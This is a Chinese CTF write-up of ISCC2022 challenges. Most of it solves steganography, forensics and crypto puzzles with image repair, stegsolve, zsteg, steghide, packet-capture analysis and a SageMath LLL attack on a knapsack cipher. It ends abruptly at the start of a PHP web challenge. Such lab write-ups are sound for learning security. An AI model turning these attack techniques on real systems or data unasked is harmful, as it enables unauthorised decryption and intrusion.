Mr.木Mu
Mr.木Mu

[CTF]-ISCC2022复现

[CTF]-ISCC2022复现

  • 前言
  • Misc
    • 2022冬奥会
    • 单板小将苏翊鸣
    • 隐秘的信息
    • 降维打击
    • 藏在星空中的诗-1
    • 藏在星空里的诗-2
    • 真相只有一个
    • 套中套
    • 666(擂台)
  • Web
    • 冬奥会
    • Pop2022
    • 这是一道代码审计题
    • Easy-SQL
    • 让我康康
    • findme
    • 爱国敬业好青年-2
  • 总结

前言

一年一度的ISCC终于结束,题目质量很高,高到做不出来

讲道理,擂台题是真的为了出题而出题,真的卷不动了

以下是自己整理的wp,有详有略,感谢师傅们借鉴思路

Misc

2022冬奥会

图片CRC值报错
在这里插入图片描述

修改高度

[CTF]-ISCC2022复现_第1张图片

得到unicode编码

在这里插入图片描述

所以rar的密码是 灯笼

[CTF]-ISCC2022复现_第2张图片

在这里插入图片描述

得到flag.jpgtxt打开就是flag

单板小将苏翊鸣

png图片改高度

[CTF]-ISCC2022复现_第3张图片

扫码得到unicode

\u5728\u8fd9\u6b21\u51ac\u5965\u4f1a\u7684\u821e\u53f0\u4e0a\uff0c\u6211\u56fd\u5c0f\u5c06\u82cf\u7fca\u9e23\u65a9\u83b7\u4e00\u91d1\u4e00\u94f6\uff0c\u90a3\u4f60\u77e5\u9053\u6b64\u6b21\u51ac\u5965\u4f1a\u6211\u56fd\u603b\u5171\u83b7\u5f97\u51e0\u679a\u5956\u724c\u5417\uff1f\u53c8\u5206\u522b\u662f\u51e0\u91d1\u51e0\u94f6\u51e0\u94dc\u5462\uff1f

解码得到

在这次冬奥会的舞台上,我国小将苏翊鸣斩获一金一银,那你知道此次冬奥会我国总共获得几枚奖牌吗?又分别是几金几银几铜呢?

分别是 15 9 4 2

合起来是压缩包密码,解密得到flag

隐秘的信息

stegsolve打开

[CTF]-ISCC2022复现_第4张图片

文件头有三行十六进制

fff495343437b377 7587045793365425
4696a54696e50345 369527dc01f8007f
fffc7e3fe00fff00 71ffffffffffffff

利用工具

CyberChef

选择模式

[CTF]-ISCC2022复现_第5张图片

[CTF]-ISCC2022复现_第6张图片

然后复制下面的 01010组合

选择

[CTF]-ISCC2022复现_第7张图片

[CTF]-ISCC2022复现_第8张图片
01组合前面删掉几位

[CTF]-ISCC2022复现_第9张图片

降维打击

png分离出另一个png
然后用stegslove打开

[CTF]-ISCC2022复现_第10张图片

分离保存png

在这里插入图片描述

魔女之旅的解密

[CTF]-ISCC2022复现_第11张图片
[CTF]-ISCC2022复现_第12张图片

藏在星空中的诗-1

解压得到三个文件: .txt .psd .zip

//.txt
1:☆✪٭☪✲
2:✡⍟⍟✸
3:☆★⚝★
4:⚝٭⚝✦
5:✮٭

.psd文件 拖进ps里面

切换通道得到顺序

[CTF]-ISCC2022复现_第13张图片

顺序:

	1 -> 3 -> 5 -> 2 -> 4

.txt 文件里的字符串按照顺序拼接成字符串

就是 .zip密码

	☆✪٭☪✲☆★⚝★✮٭✡⍟⍟✸⚝٭⚝✦

解压出来就是星空密码表

//exp
key_dict = {'٭':'A','≛':'B','⍟':'C','⍣':'D','★':'E',
            '☆':'F','☪':'G','⚝':'H','✡':'I','✦':'J','✧':'K','✪':'L','✫':'M','✮':'N',
            '✯':'O','✴':'P','':'Q','':'R','':'S','':'T','':'U','':'V','':'W',
            '':'X','':'Y','':'Z','✲':'=','✸':'{','':'}'}

# flag = "按12345的顺序拼起来填入"
flag = "☆✪٭☪✲✡⍟⍟✸☆★⚝★⚝٭⚝✦✮٭"

for i in range((len(flag))):
    res = key_dict.get(flag[i])
    print(res, end="")

藏在星空里的诗-2

	\✴\★⍣\✴⍣\✴⍣\✧≛\★☪\☆★\✴\☆✡\⍣⚝\✲✸\★✲\✧✴\✴★\☆✸\⍣⍣\⍣\✲⚝\✧☪\✧⚝

按照-1里的密码表换字符

[CTF]-ISCC2022复现_第14张图片

\QTTPU\QTTED\QTTPD\QTTPD的格式
unicode编码\u0049 \u0053 \u0043 \u0043很相似

flag = "直接粘贴星星到这里"

key_dict2 = {
            '٭':'d','≛':'b','⍟':'f','⍣':'3','★':'5','☆':'6','☪':'a','⚝':'d','✡':'1','✦':'6','✧':'7','✪':'a','✫':'b','✮':'e','✯':'F','✴':'4','':'u','':'c','':'7','':'0','':'9','':'0','':'3','':'6','':'0','':'4','✲':'2','✸':'8','':'1','\\':'\\'}

res = ""

for i in range((len(flag))):
    
    res +=(key_dict2.get(flag[i]))
print(res.encode('utf8').decode('unicode_escape'))

真相只有一个

解压出来有三个: .zip .txt stream

.png打开CRC报错,修改高度

出来一段莫斯密码

[CTF]-ISCC2022复现_第15张图片

查看lsb隐写

[CTF]-ISCC2022复现_第16张图片

ARCHP爆破密码

	19981111

stream文件修复成zip文件

	50 4B 03 04

在这里插入图片描述
保存后缀为zip

用得到的密码.zip

得到.pcapng

打开追踪tftp

[CTF]-ISCC2022复现_第17张图片

找到password.mp3

导出tftp流文件

[CTF]-ISCC2022复现_第18张图片

[CTF]-ISCC2022复现_第19张图片

保存为.mp3 用AU打开,后面有一段摩斯电码

[CTF]-ISCC2022复现_第20张图片

解密得到

	isccmisc

然后是snow隐写

SNOW

	SNOW.EXE -p isccmisc -C flag.txt

在这里插入图片描述

套中套

解压得到:.png .zip

.png

补上png文件头

	89 50 4E 47 0D 0A 1A 0A 00 00 00 0D

在这里插入图片描述

修改高度

[CTF]-ISCC2022复现_第21张图片

	 flag1: wELC0m3_

拖进stegsolve

[CTF]-ISCC2022复现_第22张图片

	flag1: wELC0m3_T0_tH3

查看lsb隐写

┌──(root㉿kali)-[~/Desktop]
└─# zsteg tzt.png 
[?] 26 bytes of extra data after image end (IEND), offset = 0x9173e
extradata:0         .. 
    00000000: 00 00 5a 6d 78 68 5a 7a  49 36 49 46 39 4a 55 30  |..ZmxhZzI6IF9JU0|
    00000010: 4e 44 58 31 70 76 4d 6e  6f 3d                    |NDX1pvMno=      |
imagedata           .. text: "\r\r\r\t\n\n\n\n\n"
b1,g,msb,xy         .. text: "t6tc\"{vW"
b1,b,msb,xy         .. file: PGP Secret Sub-key -
b2,g,lsb,xy         .. text: "*
b2,g,msb,xy         .. file: OpenPGP Public Key

得到

	ZmxhZzI6IF9JU0NDX1pvMno=


	flag2: _ISCC_Zo2z

压缩包密码是flag1flag2合起来wELC0m3_T0_tH3_ISCC_Zo2z

得到 6个文件

[CTF]-ISCC2022复现_第23张图片

参考:http://www.socold.cn/index.php/archives/106/
参考:https://sagecell.sagemath.org/

需要修改pubKeyencoded的值

fileKey = open("./pub.Key", 'rb').read()
pubKey = fileKey.decode().replace(' ', '').replace('L', '').strip('[]').split(',')
print(pubKey)
将得到的pubKey粘贴到下面的脚本里,然后用sage这个网站跑脚本即可

import binascii
import numpy as np
# open the public key and strip the spaces so we have a decent array

# print(fileKey)
pubKey = ['10063789810372889696095314520768032918368734184026934117199936395575029821256556993348582189250907159808831110807103575840591227549632727067584660080937175085575272057804367334182392439777135', '4743442091585185297160079184175826485033009186825525156594868353188967626600540200708146237600204561099909062986367431653807544181838089853953365660552045767261009020971501758097690998445659', '38269518893035096407857774239277302727612345858757763736410401065910557059006761996450912070918994942473083986403170566926571314878249524663219512834334410462926563835104801383117997256468541', '36201706035577966337670124190309667640305289691850025692737940804259910288052858085875107643597712259884565610878931155348034253378849113218094211299792181000326018919816451705698491177615276', '5751544678405803242187804801074964671483295236902453923799474332228193851677894513465849340122685617905042910441904307978577447020784397302932069786409804074941231829227581791498663002182202', '34527666564857219218498503540808987936340822691882976180860960381289448187447432855782272482888042355422276915030425664845184890100431643904229929325017908707982659435499103537422221448816743', '48346164921940596858027594064362318591031055677855412642604133586275240338427267410989194885279017471039096959554867150105231002676986044573882931885877524048019397366042599374980763063052853', '38709053554108330429733740665377583298343812352368578770716145630242725985758516999309009197871358097336924089669877716724994784786453567064513046319918499273214273842830881537971214726536145', '38562818923310964726928525974199671473198283218591413074964991673001391694146241794206472970781551037703273086539584922307526656835520871936183067060360979936744507988108949823299172780558546', '46227990261654323242643508391923390881088077378883621064182023777264461006743538752049191838971044249927379811072974624846869039473578386213353147399862595365028909870359436448908587001965707', '17353078639889960548819881219281503017226476651893585003858823093089747629320789851825464058132887208100897423906124238082051570164518371489468408461014586937036588659936983244565698947232624', '24795154595316688315739431832435443323115528152616675140615960661323548457380151708561348540228795799679622327644947624302918458257436789929803829746639694771308544745573409149055560780337635', '49031287262151394712838253351586323815557007990740709160769508902612085484344165707456513370762832022571955854767972053800822699603440323176036376384904409665909534357970974891553890403078314', '12403869009632570036122701988284983078176009509488061956287853557790124605694197982424413990892601687364941462252212435002144859906151903101600237496111415355602447279031158789483933713162728', '45862561347734543081885203774423952281618498136419505326815990169462526442294086044433955322069562581528584954914250673934803492607324114383057553059329723127809848608179194873511458727276357', '12540180686075794324809625820892209003855947938050967336307208248896524577841854339340177316058261887197837033671107679767314980243124437582789295431880214368304358394409759831124670927014486', '16351352644779264393750785119954955373954047872676593617100883633586028441730927350010839131993159505567582588680228277395085772209296657401288724511329633971178555298941942110845368022456645', '21783453730147983634936871578511591890979433809123155920143050441965012508812523565120716976488688330552215737286561745014075954594440017010662018771630959557314864225435445098780827545510505', '47809541515935891454226447255524261860071244909059514552951709615327805932683374117965468459066642046489826095202270334644186398717731357011620626114040556311996954371786110532543460189006356', '20950243362765667981422865140224647624782497144117516897855607458773186795861685786015975331957643846583267122775714443494692754953305990231830088857454899892591060310049037501210674906926943', '36979423653535328311278748340723784826298533803415751502391024772723039311364330762449359263855966469805167169344793030433502405959769835295338203919438005155467359897478348171524483046416629', '31019717610107882152688742171500422979023775133730973117081425181499621877997537680675585974201779997786817547012070724927082160347756814814006672845299360361248588952076527009536792127218025', '24124463391201569521963898793900144779897054107406203631386372792726379971202167642254032898553960037567280123461053896110061022967319674517794846985657970866841087187148783190397845773357960', '35869732430740434894903989562355496611285286637114027221360602924677190793632289594059965810486118505340006331327066297599453946014201898226771611665793804563958373994598286534858421984033827', '14906034786142420081038972683772208196511526676016616646653222005133404482999091200662195343637415955513598365467634460264067046239422746594603817615738549588277165918681655996584312782608886', '45217104918957981711495478827369797907931433107460912221742537745348577754897979374517851250704957438366161750762121570835777778500180698179131240728459021649693560633995399918484294978957743', '54447647824126349401579438670280717634493199286579649443324687754111519494256515587148739322603234238102818680761197948789334415521340294252235074686933327826297015530851750132640599147323842', '10742308296648264698038349588620550629060147173071638840649261015306463959275510949493107333103868233410071535519551446902096441128120957872200412810453687964816323392753500797028445153520984', '23597802132303655679614153616162785005817765652051402801975805052352754075713226089365769729213877613039572954239916007633596013370836091021799051320656813966441984104407829444384391807089437', '47105108757688668902733987484107361059514820249766823672263338697839130422591620212773410076611781214750322901503400400085289581899088881828161521681235698184092748073037720297818778262693729', '48053007702778908882282529654875544882368911783324695828425599732741292675210106506424541671891314530134247588820409219304568550488480630218478176999811739881449240878899706556334779219163161', '28601902750530661970140704249575450029400082637339423790138240950330827715872680442440009139547431168864455593482920795146765178376616228025724773132424168772474674872441794729059659113411072', '46295419111591786873710439417903582226177903947020540950375314220737650671708901855639905409113763882745292826676893768171923738504967632231473634672127133710674584848719308283221217520068335', '39036203109398984403836145341942843242072003647683000611359118416267708947218506885854091085485724366386646299898562873256706447038106997937649782933781478011797513917665803163276466641785148', '34558329194900169966247672250833075403512011971326462992564238211244313990324205012025887904145009994959164354957386712273937871560587437566606913001107411447570464285736716529442949297878862', '27428123444743568294143275249910737576789555485211749468226283212873743645354933031952632014589940317957153089442900806299678972441280578116527073976805756997190260653119395450772094524703928', '48022284252088597679445883368859398589003430411715711650370105709980898677853458821043143378034097824235640124012178177443728386151278230114116938716425095186721098522575235863782277329982080', '51555524636880367373858971666373919424004795472518815755397161832079595584187738184463274450837306800409977878487266109503145258218144416497117589085286587219365717596949372726110562837872096', '3822465157009382758161426245783969305492202785338416791934885253765794595361392427219369670104093857745861837064362385507237166107541296428667545060837465698054607310851989454888893034415689', '22537360789165649369446956653344348757177704573182368085293163367588113155514843912620080309075421499907958760621516167329458570193418661810277150042139580773391895772576421741731815835655030', '29957125002251802100957671202422653405133517835291011281658654930702408530689912964697292212849257211074130166977886420418344375614883515961097723038585822149620266339218660576804477642363235', '1436064842904074948684109922363629650671569314646621052368914615780499465894341363642866259885500695654788166147638126734385266296080340944805654164496363539929621646873140485884056225864530', '43629392257934259442564178437508340971069268746903425811636457370212305516023392083773909806119285793197599283692251252317514957167641264535216721559124289957643749506508551188865484894809071', '39000233661143067787456781356266760119149508226258247171218817758233307162727251293341959341507883938317284601489150370877378908249276298091889172240011404001933184507461069553547321927249026', '46327497791212481972670821496239504287123842583794576266644176107840462802761311250041951240423867107581820422255960302972715842662729405183776488935217666015150345086817557913696479603379761', '45575415314428419016881015607177520368088954051394269996327534473758970401671619051574072277690278389606946337783212232899989888952785179704575593626574003836616552164622778736046263967167540', '36261632075173053437012466509909092588750503313024386081079480305074142479351781035474747239639158941353801978840422037280671631609083667011895815894791182162239414801206219720659393759627827', '7387882604910715376410090405262902461504682608343052073408227891604918490069433275940959047726166338195791255029666206361103687977119326221057463822998708555903743252380607235923839176327664', '44875708412581524442134884721808637196294701129031928578836106366046204128981040624501074038974036815757965092251707995973797327341690712669176169600398745714111311558244875281172770940509573', '52238522125730629501541023462408596717944962025644806139373833479759379985016350393355925846096514781642909881377619454312751698912233191174989455431356123281804317849135892951839705116447717', '50204042035493973186442059099605414704944691913060454783515693815828280304850742525036781304453555346081579237723012558318817165970824091405496669529340887047962697998226088228626772051876714', '16583587377940074562782037486360560303969823777419577441900237245481649746933349175174311306878052193277049438203654432676139533684096131468942066710672564527702062870004752263439720552651490', '7517176183631700943905841752995512348029667162596611741666644896405402411635175414081025988874553312530062424986209673527789918235490216283279035740788836605564923208204850690474105784093746', '24151554471526260599266150380243206105488173320912828488163505183760340717874340589473239537424527295678812752302006361064271120665610362938778347174416944743981153090920374091506720576558279', '1057941280993246508493199919450451950519668122853298075432876420836575474051194634485672660449974896163504299076805791856155060836316815680425592195886135219494317121832505520472604364906044', '38513042803707523428512473662488812570070534158402939691380351708069371909611934723989033797554631614209027164483359735306493240115602303044316292569175814645353399660457718447745921583357421', '5938872048629323713984557127075048873383032769696926943403307026806378480414801921499011316267308868680000561977753520903509564004344041540135162846332464182504002970370341352924466932292222', '53358310173127591427703042834946903635014804005408926953420279578276137290652259390904188290004064051389098687763110675167887296385617042186081465309621362589424026981813162744901653610328990', '21483240649204269039173337128015554168964720263105177788035698497571765044706075523222430754550635569247264836921760901665109481389822037561199869525642439320381204433324957312865521910665808', '25197911543568556261817525521745074884663545488445961312227509544607147620087137360448077941682162695780012047534123423364598112551450396984467905768839853426538522875890552738035818380901086', '54615214437761495295585158358727226548841631459037393489879681235801752632994216355370549867954698639774861572188708620652822611829571091679234290694447023995916502105034311358691872630513135', '52509294828636947102764777290714729967785975633983552997196705346874599950489842148103292973631190298264174889365614297055594364179008444257281155951358302572232502889852574231597782253386808', '38482308774156269054827553864042261782570737652419132156904753587702826840372565763943764338758146315419899633177309780038787816103493668253899021491149984849243669712972036990362739329267132', '14723998251227802815971431633338656391309669741637208548267251122007535591069490317767288612057971640577425607368856138370641862962977276277335476751406712285766512480168207238795628756502116', '26807681907630963225074667107976689734022317868476552632976934273620403934994257072255494281164905040185137875705167930654806536304612571363996309392120969946453879753924638949912679561707488', '28841357955630233815963214684776169711167896382736499804742088794403670532525929633612858740879743902137708598362183602132405581735126631074381563284619144010306931598631396203098590344345383', '32827824529865161386668027237571999513157428316651497393588455153924153873886249108594122592283752892469075497068702119061380835958928590307184483740358027974865618821282423419750448661596656', '29811097208177413599501829416745207791907839643795600850185917674894982410325752389024479288736318499810871621620547812412372953494855656288242015150983539153844227020746820876578926055342574', '34553396185870878280031399176656785824962768560445717887851086920034089959171473932034871290427155986436947793287730183003000712154576950893212590802257726468691091033974825651319638045878708', '44928971404703350641489093183007291066680089268405174041232892538574630481698354673000658608523503319082114856132503124891341708960538413134831652644117912265795132376968070315980240084224231', '52217420966948149526424447591370122073796461235287267373300897295662024169142632184971065512775710478938026820104292331013372756777430604690958050409595037843501496108228747917343544851591078', '12257095633938773312118021173585364967208850235650200834625528937875522108462836600934826698975565498414976333230507429603440544546722201848036301972706036506157680868830172318988719036723820', '10050949374837839052660902790726982377855935805210257907172009099564461606525432214236946050347334350070196362327883475202009595471391185823964104993196132188925139792015496227496511962642982', '51732558073756743739888045988807126171225493508965944026181361045353101889174120069055226252724323445005817298236146149887099520488726787831212371368593536513668187708131156817733070085823502', '27964710862972558318943714982578359017600749388827183747308536616036223793534209551833719174776906054383645359920298282617504540480351281651882418468467340037439436320244047105134550757603084', '48961054262995409447668666229026379753802031514119305290180003832979659967286308698599815450765808218314074568039418048992227942933106241928836855621270245354423467077766525532700224456376352', '32455781150290888664646733254519109851307762270574239301432992578759833389376713607622383172750112111952698644451952618680917743940055328271335285181326806410609646572045090424267159580263436', '52504060180314468669837873610304375936767220453607858437965326591239566669093936677129829739885150502310309335129172587496008127878926991088058727151850694210144756872869730508811342464905977', '16062376927121312672665282966906896165838611799482863876484167895702380435968058628373926746599875889763088257403965877533547540554561102253822875044733061509917881944191441050341987328031553', '4658854447216543969501389606365505396081039055821016291877757005351382185951448956485785842609235689353866194800044238158554919963177588137921204614816591168792339242861373171242389401027629', '10927211087759209001139113410695848133705805109364988624103014808826621903005695361742733414250080267594311783147395803140250531090228290283853034336944017294289408712205124811482676858633541', '14941426794015201990905301253392367906401597843948537732649589161920386136306693193220177344987997846615180283298622990119891380163400097110538070157528387632172698092164551917412480961963566', '40687795680805607297859770387831764943913894940053464533374641432388792856461850396165246118105639111927800655038592225801191849820323611257567662388831226710990015180611040962604783287683959', '13227530066599981644283413335254775387754802961911362655758004474516294171542872863557514753418058300313498469574870958390419681845151979672241661705289414714204981210010765275121699979666834', '18578141384390335349536651968450884385054452930960422793955932392207658506521387630889753475751236006940472921055868277260173064504830828678444381378607019297313006509561255191952400585235002', '45566261557226132128448748179943974201658968108861755674091533360544260780994173076346978451899737405529891670106508951946513633183732643866669254497193948285572456425283604896194974559118813', '53038180481570860924243977147642435822937410810994151276035696705087183408534036282013246132513974777015179475429137041658285240740178698623214655578495933260464089303191747834550519648138337', '43328784297914801254646283463585782273591055741904853268139287777135385795544060370773284372921566874975164114541756403264481125130461523160750291478697313198034643233382312001909697886074405', '35685822789395339612191010950430568505277861306273156063527656739474946182079935341565684937973763188965899476652877479970372184977151613937265309833814026484089349836563233427225632627866136', '18537330396659062033126486248949948018674453893255086510008150543657508665704921293108964172851444255465997489648299860392415748768127989102212734305316233795090438472704370904578276482220020', '9292673242825602963210660292619459543349355488210999495940043719780525926381015495968164196762506407313289119114026581227919873258485883633611706927814974534041585988348332277667175292587600', '25199877539392851621386613500696303714570115959455712535909820036148798636723927798435418342240612058145050333654309888033516886406694701213921392589317403149879151043978676356338321418281014', '132604575209569782680272937730791994394562782707699678851333244693051270471869882009473563292098882970547894686390032744971284841293034014118741954151007921474901627390246245202740093794874', '40295121469112465128867245750456025272049987984065114371041620231389357054885625689206739480866854235438313539563604122929265911399407829981817153591706558624973783743250535563928449899706475', '52656935626676758471036772674391852189740250645638083608988394882986112573928529876632016056842257975313870440800347317697123892424560431002680074319464000353903592759411548849765603597998647', '22784394605156131952491340906576327186480686928124127047840230738698083276762672405532136867224426258174188799848581059071185634708735324586006742585405980408051096994708191009390050940679367', '29038482826731855524097360005677660259729208556563861966376827847865861670943627336435331629168085591491022534719608288882766031425036068563252181205322041448622227123369470800186409393789965', '1315262189413040636471006855982888610673520288334166309114761732555783464300410168306614390167515507493520105864445366319517935330682829728842194683698284882189020375827883970901400818712913', '22337828869445877580973921983160520619359801665106287547068826241774532479571858620877886862870936066407872707793086898079535499481402423033562694709410194214355832550179217493752616259677505', '5109095908438514051979877372281071274800035973419418816624882096222321573131225701459447030005488751367475538581398027686557967973735990269154020767856116530595761811107713838722840101884771', '34181429136507565016439758780393919889423583664525170842781533729997605960304138659989222524049728255558239672114476613354526233332434273064190558370384478792572953495632745821603049542450054', '26548643262336520213569966226764392225226179304719127568914813577939954063189133331960965566322821276346099880877340105995401512821113128774266592916725334417455137656937338364345476602533405', '7944079661231639940520983403102060637750749065646753059984202877114599811686329415273161355045710521930144382855058165252182577414362529534876108072794615335472758580908306723952067162956425', '37301286809186939554103144916712910847216831064137057843412839850721559429772718886567790404595108519635727368878158756440453646616994720074790200914766289363825416025502867562492671476137017', '22823604056130881908016088281564707526389673418779004852573520117955129015116556445498922826075270249672964830011555603214251745963641266226868467865904969916277326627396895546096245610836601', '11308946804973054929798236628249073017768968207536748784418840125268755256340787108780892247205248544065247084158925581922736856001780672215356339925406045759970066925654429165397961723488963', '45444366023439345740852400053017791295515010485582426942690316400843555586206762896222506025875696651475463277948295164925698350235412741544700500653285625053556121025840900039048153203853468', '29068063655289922650574157043495707171308504666357444806188153263861774121548407464919325104610741132871425222733263301963810106634238512505541709040376321636298885298742786787027807114036530', '42566112143285519132804596063132345770556531692421390057892268290158659879510936856833192184998506048312474942207196090616281185304235370736255783343298809740370428357677679903372422241754278', '30759483974511337226877218136940041789859548951368552606205379982918783800011348252225280060445905627704015300652799586922710927538852628750368363065440144953305498207921838168908328353269566', '44431107841579348295297867211319071557871641265729783729341158076355920407988033476228602531831575691415310183176836928237313255621558613796055229794001442031934750173759551089564059562283538', '37807378874586959931972483360303846932291900481468551143369054246508113775527214158137810643087614140356908774528587133036125794969035644158220991978401188873245320364162908798789553647082629', '21362791035655429090967186524824063163466083832732882987020378664634586733503417360812156272429633385289066372649210538339249599053509788830271083163372234551287833347967547530454790123670897', '46462276910420938114146592988455915474487966356899821653129346396624629150485847262911347252004751976727010228259243858404127528633948174180240030426126407604235951152172628858635183976260109', '3196973522681085144086054857727614941120692568413116193179634044125721287897571674811066089695687375705634757787969109754731095877067598126377484107566473266111400051654904303676643232963668', '700791019609289606121276729900179691972761055146119417305657918661443209761167093384979714685833088725549763479149393142565351472286721720172962988567117949841148130108320732685442248822649', '4206270708235953358246536550159357866037558361886934909630416746803795941970609164558525918828013364189901204855047640947497963335061878133316315014304534896165039876267341046661372333296030', '7105757076246218390515229001017692240725029757489231824327347511399169512747691875839413083288837769216082403384492854551767409264682092825680193405390661952513249660162929400043461550717558', '15795653125616079691367201301176589699602336512591840888035442433184305206660274818926176647506047821756190056122361109907186414134656658519598766521020462031146533527077772678513926164976167', '29914914957511735478804203941581395021109743365374669184377143646280463300983016273234781550428542993202127984180944281303418843664600220404066219718093187204052364651032212488751155038402587', '54716173017077745994428907801493048286135915078546357521897015025174228081697616001865685274673175677904434670775239681877772407144514427709958805816086974969379251138284555067159437075182377', '18422172322692548060412225686884490152495556131321088180730004339358486965449703080420403130982398702011862813832744201440290544249411039710855696702765071001841979480752249247473886552423633', '17966578288127482446042587662264517478658585501741016442696887296960644240455219570261554143845406542990741999106367697052964706113414505169947962966632231539960660321067956479773928556490057', '27603122425058239504200785214115950253662336935329068073172908880583830675876255903954770583681034410165391991983590481975641811338471911740804896761787426319359238767535246574051152752033058', '16827878721282997302862323904672275739378633189558940986930802955283564094107693490176464594726232670253841013131160400034436258190602523744726621288362487097349751923441197576627543257519420', '46229505877764298057929260627276582234922535351968711467641006069914143345957293981409788142861156034159989904303305925369271147049492644531051754507459761194075594463355608951392881153573346', '38537902916067708926540012105158870270686392417322682560698547867508074961801474444654377682618613662040336660738784196883009169195974847925733051186859942736146997185882400202428596974454269', '31976833727477585532499953759004849999538869885751339315712206728299183127955258060221382575661697397642359175159018914460796607181402714774579872127931512107239645641421796260769107500714114', '34503447513391934592827210912339458751294848253990259694922494803790182399106097631313734712572297269980821329003314073142813813833060895458399696881135877595976849469746819656886497640348300', '49769864641669276288656438170143082924678036293618106760442201531978768614797755640560265830508220399372218188474095043219968046829231590971082798335994985931226675354799752657193465084817186', '35576789236540264861044477276803856156624054886502176949976449461033132163578179744642729270112540074690144748062643535142836270683438653303170532643882504971526634116409173807221347584102358', '8049833939120234024889147769779930005765872866075373166896007981977120077843306585881951535077977783981071790718849358783050493075756289731440236329417442676298357664519257423120381909665101', '51770890708648930990473692350740784525466922761861880546302103162090454670635811119439155995558614894545647739090511466551520919007498060356363279482447294883059165672117902126109397997073372', '21201355644895391367448905323991201173937128416649358894582193918658648303269606005802632394261197256727865030716495299364653762147786465012025010334325432433063894773599311468749850333127808', '44523496491210882552514021393646303301943600829802859482876210455262498387724131036093655060427458317960395002640570614357683861847654732999137683906313068801518714493810390320788901478674048', '31709621144966401929567646391305291066500192443005717591911791323431935377074293306381393902519152636387749286398666383799698878118286580143086404194057895219102312985746199256558686124201377', '38409980145391173067429496438601238954271634131941909063906116751754976643489673813968394185889288815228064776955747285741325906046180262035836195048343719109059472497531695021023676342962758', '17952185456321435051699901703792885016187805424275724198778212628637244926127001716779439368304716711479484571403044121058780125096938746174629237868248064991144866609725441795904376425036939', '1743735895834989817525127138182645240216684153976923691205857070673437932184966183020022325421396679996854643890048978304945853564876657645956657685758312799310044801848136420236054498224185', '35777905477742220026630920875049280798990951485026298300638546976128542970714028405893946922983060225735619580846787686987018674779529414930919987433950764577382530911400846218055236120563021', '45416639574665042448115862642404070196669912767075481359148749289154561185665854153484561880861491225960849756973175784604890315560779507778422744260558317710307062823422175589469302970528188', '14433277226197493383476078564634737572477540733823509077504131837212410599814958183069551961890530932730671698313660603761038550084864331169744226091159236138429927860981172627362141728824234', '23446370205256034245439755662192636080736413199828887850637612501278500560981357488187979168868021102594863994432120114988143511826853479591163769450539017828326128981619778119502681416004253', '21123302524408966261283477039051722734991940726317234254142874652334008657176435132047161990126559570954287993819577685994634823505671854685391296069824445990871524478289563854435869929136207', '24001449733079065335921187308374936954153893720450492210920090223434540068921499878248680724619884619097902126417783630133921407934966937288860628830323991154798575636145243163416494129318261', '20618214457412419233607356303690646553807819326188930053634020744341822443375906046980648440472825828807544724450565726433513087204010617631523812011236954195489866576702793141134672397594792', '21688603638571240926298381182849497146174491623963103891237595247499652181386058705131822900107509806191648872849397488830994889197001721008623318547160047106686053513268242936398043472821071', '17909821178301317282850116796660504481439544501306598236252587531727175791165137622014333808457081617177448967186053258060690577249721690725247613043237051702044005375040100650149533533840556', '24404135642371875433612578145058364752435303741450081294368271939203883304145426054657276920668459497088289122599053032196285198674395052132479494662472401655404773649550108799234985687600273', '32138872261217961687283270672484079134053275116825150758820691698536560320464458555058636262785948465806206228043340841166110566134728968678605654342481476586135421815555957027724810858795168', '11781358056494036377634732425140878010907889265876452129154572749754356630483089595252335227941386899598815228058413738350845898880593097734801336859961266712446271564888048631166507566863887', '6688522412392828614205450917505726851076123239150704744465994601670112519516913615337838611858896947969696291633222900736347242838049082363155963742878177003505912014860685771088662048216188', '19820903074234252817452045106899481459324805558611343928264515500349745963478546226536866656127271894380085013790988638365097953592594339948116348385029898366346861831350997011145543801746480', '31097520735994636388634276441771476014846959234938975892488698778375433094479499586827522982528498467326591796494931812348602425415205028850675139692152607149483572730421706992158836689591396', '17238510373757756434723781969301929801476473973848214287297461424742926606108977507345001139417469942095386499733604169857722871161726212579796939673765746064429210470385523024823387172767893', '10567097569055267138871270756095960711109869421545008753349287187636013562157401113494440231234207415326208853825850282535583333384188658924233314521850357318077653619046517097955814734013400', '38884487725687927821644349464396276127755805469262378808045727711976433369544661356745058698913497523374893771963308918446561784264171163868304275346955013082460183416217256762734661011800422', '33995328130217237732262643078999597648969676221683808561043343329606690833995784280583888956832551605957915895679270758690820994439614446417456476500510764406850588757213496523533403626628857', '17230485646223725119023637474562354979682531046382482298467777125743523344160833481684957705945243676577545813750300338550174564912198422516072858677813307287467660563116848362819394605254543']
nbit = len(pubKey)
# open the encoded message

encoded = '234502427313 3851628980480729092740080080179042040522668424067060675838154455417895873860812565697947777847110235716125348816752812046560384404046934248354554221371354009355694504417479606647024'
print("start")
# create a large matrix of 0's (dimensions are public key length +1)
A = Matrix(ZZ, nbit + 1, nbit + 1)
# fill in the identity matrix
for i in range(nbit):
    A[i, i] = 1
# replace the bottom row with your public key
for i in range(nbit):
    A[i, nbit] = pubKey[i]
# last element is the encoded message
A[nbit, nbit] = -int(encoded)

res = A.LLL()
for i in range(0, nbit + 1):
    # print solution
    M = res.row(i).list()
    flag = True
    for m in M:
        if m != 0 and m != 1:
            flag = False
            break
    if flag:
        print(i, M)
        M = ''.join(str(j) for j in M)
        # remove the last bit
        M = M[:-1]
        M = hex(int(M, 2))[2:]
        print(M)

[CTF]-ISCC2022复现_第24张图片

得到十六进制字符串即可

在这里插入图片描述

666(擂台)

zip伪加密

修改deflag得到jpg

lsb隐写

	steghide extract -sf src_sec.jpg -p 123456

得到 .pngcrc报错修改高度得到

[CTF]-ISCC2022复现_第25张图片

得到pcapng解压密码,追踪tcp流能发现两张gif

[CTF]-ISCC2022复现_第26张图片

[CTF]-ISCC2022复现_第27张图片

第一张图能得到一段base64

SE1ERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==

HMDEkey:852 987456321 98423 98423 REALkey:xSxx
这串数字是手机按键密码 
解出来是 ISCC

tcp流17发现一个网址

[CTF]-ISCC2022复现_第28张图片

	https://www.cnblogs.com/konglingdi/p/14998301.html

.gif,有三段数据

SE1ERWtleTo4NTIgOTg3NDU2MzIxIDk4NDIzIDk4NDIzIFJFQUxrZXk6eFN4eA==
pQLKpP/
EPmw301eZRzuYvQ==

aes解密,密钥是ISCC

	pQLKpP/EPmw301eZRzuYvQ==

[CTF]-ISCC2022复现_第29张图片

	lbwmeiyoukaig

Web

冬奥会

源码


show_source(__FILE__);
$Step1=False;
$Step2=False;
$info=(array)json_decode(@$_GET['Information']);
if(is_array($info)){
    var_dump($info);
